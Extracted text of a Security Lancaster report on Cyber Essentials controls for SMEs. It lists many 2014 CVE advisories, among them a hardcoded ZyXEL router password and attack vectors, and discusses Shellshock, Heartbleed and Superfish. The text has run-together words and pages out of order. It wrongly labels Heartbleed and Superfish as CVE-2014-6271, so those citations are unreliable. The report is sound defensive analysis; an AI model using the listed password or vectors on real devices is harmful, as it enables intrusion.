MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
